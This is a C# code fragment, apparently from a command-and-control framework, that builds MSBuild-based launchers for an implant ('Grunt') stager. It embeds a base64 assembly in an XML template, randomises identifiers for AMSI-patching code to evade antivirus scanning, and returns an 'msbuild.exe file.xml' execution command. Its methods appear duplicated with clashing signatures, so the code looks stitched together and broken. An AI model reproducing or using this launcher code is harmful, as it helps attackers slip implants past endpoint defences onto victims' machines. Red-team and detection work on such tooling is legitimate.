public override string GetLauncher(string StagerCode, byte[] StagerAssembly, Grunt grunt, ImplantTemplate template)
{
this.StagerCode = StagerCode;
this.Base64ILByteString = Convert.ToBase64String(StagerAssembly);
this.DiskCode = XMLTemplate.Replace("{{GRUNT_IL_BYTE_STRING}}", this.Base64ILByteString);
this.DiskCode = DiskCode.Replace("{{TARGET_NAME}}", this.TargetName);
this.DiskCode = DiskCode.Replace("{{TASK_NAME}}", this.TaskName);
// Replacements for obfuscation
this.DiskCode = DiskCode.Replace("{{PATCH_AMSI}}", this.random_var_patchAmsi);
this.DiskCode = DiskCode.Replace("{{AMSI}}", this.random_var_amsi);
this.DiskCode = DiskCode.Replace("{{MEMORY_STREAM}}", this.random_var_outputMemoryStream);
this.DiskCode = DiskCode.Replace("{{DEFLATE_STREAM}}", this.random_var_deflateStream);
this.DiskCode = DiskCode.Replace("{{BYTE_ARRAY}}", this.random_var_byteArray);
this.DiskCode = DiskCode.Replace("{{READ}}", this.random_var_read);
this.DiskCode = DiskCode.Replace("{{LIB}}", this.random_var_lib);
this.DiskCode = DiskCode.Replace("{{AMSI_DLL_0}}", this.random_var_amsi_dll[0]);
this.DiskCode = DiskCode.Replace("{{AMSI_DLL_1}}", this.random_var_amsi_dll[1]);
this.DiskCode = DiskCode.Replace("{{AMSI_SCAN_BUFF_0}}", this.random_var_amsiScanBuffer[0]);
this.DiskCode = DiskCode.Replace("{{AMSI_SCAN_BUFF_1}}", this.random_var_amsiScanBuffer[1]);
this.DiskCode = DiskCode.Replace("{{AMSI_SCAN_BUFF_2}}", this.random_var_amsiScanBuffer[2]);
this.DiskCode = DiskCode.Replace("{{ASSEMBLY_BUFFER}}", this.random_var_assemblyBuffer);
string launcher = "msbuild.exe" + " " + template.Name + ".xml";
this.LauncherString = launcher;
return(this.LauncherString);
}
public override string GetLauncher(Listener listener, Grunt grunt, HttpProfile profile)
{
this.StagerCode = listener.GetGruntStagerCode(grunt, profile);
this.Base64ILByteString = listener.CompileGruntStagerCode(grunt, profile, this.OutputKind, true);
this.DiskCode = XMLTemplate.Replace("{{GRUNT_IL_BYTE_STRING}}", this.Base64ILByteString);
this.DiskCode = DiskCode.Replace("{{TARGET_NAME}}", this.TargetName);
this.DiskCode = DiskCode.Replace("{{TASK_NAME}}", this.TaskName);
string launcher = "msbuild.exe" + " " + "file.xml";
this.LauncherString = launcher;
return(this.LauncherString);
}
public override string GetLauncher(string StagerCode, byte[] StagerAssembly, Grunt grunt, ImplantTemplate template)
{
this.StagerCode = StagerCode;
this.Base64ILByteString = Convert.ToBase64String(StagerAssembly);
this.DiskCode = XMLTemplate.Replace("{{GRUNT_IL_BYTE_STRING}}", this.Base64ILByteString);
this.DiskCode = DiskCode.Replace("{{TARGET_NAME}}", this.TargetName);
this.DiskCode = DiskCode.Replace("{{TASK_NAME}}", this.TaskName);
string launcher = "msbuild.exe" + " " + "file.xml";
this.LauncherString = launcher;
return(this.LauncherString);
}